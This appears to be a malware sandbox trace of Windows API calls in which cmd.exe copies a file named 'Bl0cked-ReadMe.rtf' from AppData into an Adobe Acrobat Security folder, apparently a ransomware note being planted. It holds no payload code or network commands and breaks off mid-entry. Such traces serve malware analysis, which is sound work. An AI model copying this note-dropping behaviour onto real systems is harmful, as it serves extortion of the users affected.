GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0146.116] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf9c0 | out: lpMode=0x1cf9c0) returned 1 [0146.116] _dup (_FileHandle=1) returned 3 [0146.117] _close (_FileHandle=1) returned 0 [0146.117] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0146.117] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1cf990, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0146.118] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0146.118] GetConsoleTitleW (in: lpConsoleTitle=0x1cf7c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.118] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0146.118] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0146.118] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0146.118] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0146.119] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.119] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1cf324, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf324) returned 0x3a0ec8 [0146.119] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0146.119] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0146.119] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0146.119] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ce230, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0146.120] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0146.120] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.120] GetFileType (hFile=0x54) returned 0x1 [0146.120] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.120] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1ce288 | out: lpFileSizeHigh=0x1ce288*=0x0) returned 0x1632 [0146.120] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.120] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.120] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.120] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.121] GetFileType (hFile=0x4c) returned 0x1 [0146.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.121] GetFileType (hFile=0x4c) returned 0x1 [0146.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.121] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] GetFileType (hFile=0x4c) returned 0x1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] GetFileType (hFile=0x4c) returned 0x1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] GetFileType (hFile=0x4c) returned 0x1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] GetFileType (hFile=0x4c) returned 0x1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] GetFileType (hFile=0x4c) returned 0x1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] GetFileType (hFile=0x4c) returned 0x1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.123] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.123] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.123] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.123] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] GetFileType (hFile=0x4c) returned 0x1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] GetFileType (hFile=0x4c) returned 0x1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] GetFileType (hFile=0x4c) returned 0x1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] GetFileType (hFile=0x4c) returned 0x1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] GetFileType (hFile=0x4c) returned 0x1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] GetFileType (hFile=0x4c) returned 0x1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] GetFileType (hFile=0x4c) returned 0x1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] GetFileType (hFile=0x4c) returned 0x1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.124] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.124] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.124] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.124] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] GetFileType (hFile=0x4c) returned 0x1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] GetFileType (hFile=0x4c) returned 0x1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] GetFileType (hFile=0x4c) returned 0x1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] GetFileType (hFile=0x4c) returned 0x1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] GetFileType (hFile=0x4c) returned 0x1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] GetFileType (hFile=0x4c) returned 0x1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] GetFileType (hFile=0x4c) returned 0x1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] GetFileType (hFile=0x4c) returned 0x1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.125] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.125] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.125] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.125] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] GetFileType (hFile=0x4c) returned 0x1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] GetFileType (hFile=0x4c) returned 0x1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] GetFileType (hFile=0x4c) returned 0x1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] GetFileType (hFile=0x4c) returned 0x1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] GetFileType (hFile=0x4c) returned 0x1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] GetFileType (hFile=0x4c) returned 0x1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] GetFileType (hFile=0x4c) returned 0x1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] GetFileType (hFile=0x4c) returned 0x1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.126] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.126] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.126] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.126] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] GetFileType (hFile=0x4c) returned 0x1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] GetFileType (hFile=0x4c) returned 0x1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] GetFileType (hFile=0x4c) returned 0x1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] GetFileType (hFile=0x4c) returned 0x1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] GetFileType (hFile=0x4c) returned 0x1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] GetFileType (hFile=0x4c) returned 0x1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] GetFileType (hFile=0x4c) returned 0x1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] GetFileType (hFile=0x4c) returned 0x1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.127] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.127] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.127] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.127] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] GetFileType (hFile=0x4c) returned 0x1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] GetFileType (hFile=0x4c) returned 0x1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] GetFileType (hFile=0x4c) returned 0x1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] GetFileType (hFile=0x4c) returned 0x1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] GetFileType (hFile=0x4c) returned 0x1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] GetFileType (hFile=0x4c) returned 0x1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] GetFileType (hFile=0x4c) returned 0x1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] GetFileType (hFile=0x4c) returned 0x1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.128] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.128] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.128] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.128] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] GetFileType (hFile=0x4c) returned 0x1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] GetFileType (hFile=0x4c) returned 0x1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] GetFileType (hFile=0x4c) returned 0x1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] 